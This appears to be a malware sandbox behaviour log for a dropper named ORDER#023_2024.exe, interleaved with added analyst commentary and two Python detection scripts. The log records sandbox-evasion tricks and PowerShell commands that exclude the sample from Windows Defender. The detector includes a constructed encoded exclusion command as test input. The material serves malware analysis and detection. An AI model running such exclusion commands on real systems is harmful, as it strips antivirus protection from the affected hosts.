                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Process information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        Source: Yara match, File source: Process Memory Space: ORDER#023_2024.exe PID: 6936, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Memory allocated: 2920000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Memory allocated: 2B80000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Memory allocated: 2920000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Memory allocated: 7A70000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Memory allocated: 8A70000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Memory allocated: 8C20000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Memory allocated: 9C20000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Memory allocated: 14C0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Memory allocated: 3000000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Memory allocated: 2E40000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6784
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1924
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Window / User API: threadDelayed 2608
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Window / User API: threadDelayed 7151
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 7004 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2120 Thread sleep time: -9223372036854770s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4008 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6360 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 5480 Thread sleep count: 2608 > 30
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep count: 39 > 30
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -35971150943733603s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -100000s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -99875s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 5480 Thread sleep count: 7151 > 30
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -99766s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep count: 33 > 30
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -99641s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -99527s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -99422s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -99312s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -99203s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -99094s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -98969s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -98836s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -98469s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -98337s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -98219s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -98110s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -97985s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -97860s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -97735s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -97610s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -97485s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -97360s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -97235s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -97110s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -96985s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -96860s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -96735s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -96610s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -96485s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -96360s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -96219s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -96094s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -95985s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -95860s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -95735s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -95610s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -95485s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -95360s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -95235s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -95110s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -94985s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -94860s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -94735s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -94610s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -94485s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -94360s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -94235s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -94110s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -93985s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -93860s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -93735s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -93610s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe TID: 2852 Thread sleep time: -93485s >= -30000s
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 100000
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 99875
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 99766
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 99641
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 99527
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 99422
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 99312
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 99203
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 99094
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 98969
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 98836
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 98469
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 98337
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 98219
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 98110
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 97985
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 97860
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 97735
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 97610
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 97485
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 97360
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 97235
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 97110
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 96985
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 96860
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 96735
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 96610
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 96485
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 96360
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 96219
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 96094
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 95985
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 95860
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 95735
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 95610
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 95485
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 95360
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 95235
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 95110
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 94985
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 94860
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 94735
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 94610
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 94485
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 94360
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 94235
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 94110
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 93985
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 93860
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 93735
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 93610
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe Thread delayed: delay time: 93485
                        Source: ORDER#023_2024.exe, 00000005.00000002.2903870368.00000000012C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllBRr
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeMemory allocated: page read and write | page guardJump to behavior
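The seventeen "Thread delayed" entries above decrease by exactly 125 each time, which is the footprint of a sleep loop rather than of independent waits, and no single delay is long enough to trip a per-call threshold on its own. The following script is an added example, not part of the Joe Sandbox report or of the sandbox's own logic: it parses such behaviour lines, checks whether the delays form a constant-step countdown and totals them. The report does not state the unit of the delay value; milliseconds is assumed here, and the 3-minute threshold is my choice, mirroring the "Contains long sleeps (>= 3 min)" signature in the overview.

```python
"""Spot sleep-based stalling in sandbox behaviour output.

Added example, not part of the Joe Sandbox report.  The unit of the delay
value is not stated in the report; milliseconds is assumed.  The 180 s
threshold mirrors the "Contains long sleeps (>= 3 min)" signature and is
my choice, not the sandbox's rule.
"""
import re
from typing import Dict, List, Optional

DELAY_RE = re.compile(r"Thread delayed: delay time: (\d+)")

# Constructed input: the seventeen delay values from the report above
# (95485 down to 93485 in steps of 125) plus two unrelated behaviour lines,
# to show that only delay lines are picked up.
SAMPLE_LINES: List[str] = [
    f"Source: C:\\Users\\user\\Desktop\\ORDER#023_2024.exe Thread delayed: delay time: {95485 - 125 * i}"
    for i in range(17)
] + [
    "Source: C:\\Users\\user\\Desktop\\ORDER#023_2024.exe Process token adjusted: Debug",
    "Source: C:\\Users\\user\\Desktop\\ORDER#023_2024.exe Memory allocated: page read and write | page guard",
]


def parse_delays(lines: List[str]) -> List[int]:
    """Extract delay values in the order the sandbox logged them."""
    return [int(m.group(1)) for line in lines if (m := DELAY_RE.search(line))]


def countdown_step(delays: List[int]) -> Optional[int]:
    """Constant difference between consecutive delays, or None when the
    sequence is not an arithmetic progression (needs at least 3 samples)."""
    if len(delays) < 3:
        return None
    diffs = {b - a for a, b in zip(delays, delays[1:])}
    return diffs.pop() if len(diffs) == 1 else None


def analyze_delays(delays: List[int], long_sleep_ms: int = 180_000) -> Dict[str, object]:
    """Summarise the delays the way a triage note would: how many, how long
    in total, whether one loop produced them, and whether the aggregate
    crosses the long-sleep threshold even though no single call does."""
    total = sum(delays)
    step = countdown_step(delays)
    return {
        "count": len(delays),
        "total_ms": total,
        "max_single_ms": max(delays, default=0),
        "step_ms": step,
        "looks_like_loop": step is not None and step != 0,
        "exceeds_long_sleep": total >= long_sleep_ms,
    }


if __name__ == "__main__":
    for key, value in analyze_delays(parse_delays(SAMPLE_LINES)).items():
        print(f"{key:>20}: {value}")
```

On the values from this report the largest single delay is 95,485 (about 95 s), but the seventeen calls add up to 1,606,245, roughly 26.8 minutes, with a constant step of -125: a sandbox that only patches out individual long sleeps would still lose most of its analysis window to this loop.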

                        HIPS / PFW / Operating System Protection Evasion

                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER#023_2024.exe"
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER#023_2024.exe"
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe; Memory written: C:\Users\user\Desktop\ORDER#023_2024.exe base: 400000 value starts with: 4D5A
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER#023_2024.exe"
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe; Process created: C:\Users\user\Desktop\ORDER#023_2024.exe "C:\Users\user\Desktop\ORDER#023_2024.exe"
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe; Process created: C:\Users\user\Desktop\ORDER#023_2024.exe "C:\Users\user\Desktop\ORDER#023_2024.exe"
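Two details in the process-creation lines above matter for detection. The sample excludes its own on-disk path from Defender, so the excluded path equals the parent process image; and although the command line asks for System32\powershell.exe, the process that actually ran is SysWOW64\powershell.exe, because the 32-bit parent was subject to WOW64 file-system redirection, so a rule keyed only on the System32 image path would miss it. The script below is an added example, not part of the report and not a Joe Sandbox or Sigma rule: it runs a check over process-creation records shaped like Sysmon Event ID 1 (the field names image, parent_image and command_line are my own simplification) and flags PowerShell command lines that add or replace Defender exclusions, whether written in clear, as here, or hidden behind -EncodedCommand (UTF-16LE, base64), which the overview's "Powershell Base64 Encoded MpPreference Cmdlet" signature refers to. The first record reproduces the command line from the report; the other two are constructed.

```python
"""Flag Windows Defender exclusion tampering in process-creation telemetry.

Added example, not part of the Joe Sandbox report.  Record shape (image,
parent_image, command_line) is a simplification of Sysmon Event ID 1 and
is my own; the first sample record reproduces the command line from the
report, the other two are constructed.
"""
import base64
import re
from typing import Dict, List, Optional, Tuple

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
# -enc, ...).  This pattern over-approximates that set; a candidate token
# still has to base64-decode to valid UTF-16LE before it is used.
ENCODED_RE = re.compile(r"(?:^|\s)-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)
CMDLET_RE = re.compile(r"\b(Add|Set)-MpPreference\b", re.I)
# First argument of each exclusion switch; comma-separated lists are not split.
EXCL_RE = re.compile(
    r"""-Exclusion(Path|Process|Extension|IpAddress)\s+("[^"]*"|'[^']*'|[^\s,;|&]+)""", re.I)


def _encode(cmd: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # From the report: the 32-bit parent asked for System32\powershell.exe,
        # WOW64 redirection ran SysWOW64\powershell.exe.  Match on the command
        # line, not only on the image path.
        "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Users\user\Desktop\ORDER#023_2024.exe",
        "command_line": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                        r'Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER#023_2024.exe"',
    },
    {   # Constructed: same intent as a directory exclusion, hidden in -enc.
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Users\user\AppData\Roaming\svc.exe",
        "command_line": "powershell.exe -nop -w hidden -enc "
                        + _encode(r"Set-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'"),
    },
    {   # Constructed, benign: listing exclusions changes nothing.
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\explorer.exe",
        "command_line": "powershell.exe Get-MpPreference | Select-Object ExclusionPath",
    },
]


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Decoded -EncodedCommand payload, or None if absent or not valid
    base64 / UTF-16LE."""
    m = ENCODED_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _covers(exclusion: str, image: str) -> bool:
    """True when a path exclusion is the image itself or a directory above it
    (case-insensitive, as NTFS paths normally are)."""
    excl = exclusion.casefold().rstrip("\\")
    img = image.casefold()
    return img == excl or img.startswith(excl + "\\")


def detect_defender_exclusion(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return detection details for an exclusion change, else None."""
    decoded = decode_encoded_command(event["command_line"])
    text = decoded if decoded is not None else event["command_line"]
    cmdlet = CMDLET_RE.search(text)
    if cmdlet is None:
        return None
    exclusions: List[Tuple[str, str]] = [
        (m.group(1), m.group(2).strip("\"'")) for m in EXCL_RE.finditer(text)]
    if not exclusions:
        return None
    parent = event.get("parent_image", "")
    return {
        "cmdlet": cmdlet.group(0),
        "exclusions": exclusions,
        "encoded": decoded is not None,
        # The pattern in this report: the dropper whitelists its own path.
        "self_exclusion": any(kind.casefold() == "path" and bool(parent) and _covers(value, parent)
                              for kind, value in exclusions),
        "parent_image": parent,
    }


if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        hit = detect_defender_exclusion(event)
        print("FLAG" if hit else "ok  ", event["command_line"][:72], hit or "")
```

Set-MpPreference is matched alongside Add-MpPreference because it replaces the whole exclusion list and is just as effective for an attacker. On a live host the same change also surfaces as event 5007 in the Microsoft-Windows-Windows Defender/Operational log and as a new value under HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths, which is where to confirm a hit from this kind of telemetry.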
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Users\user\Desktop\ORDER#023_2024.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
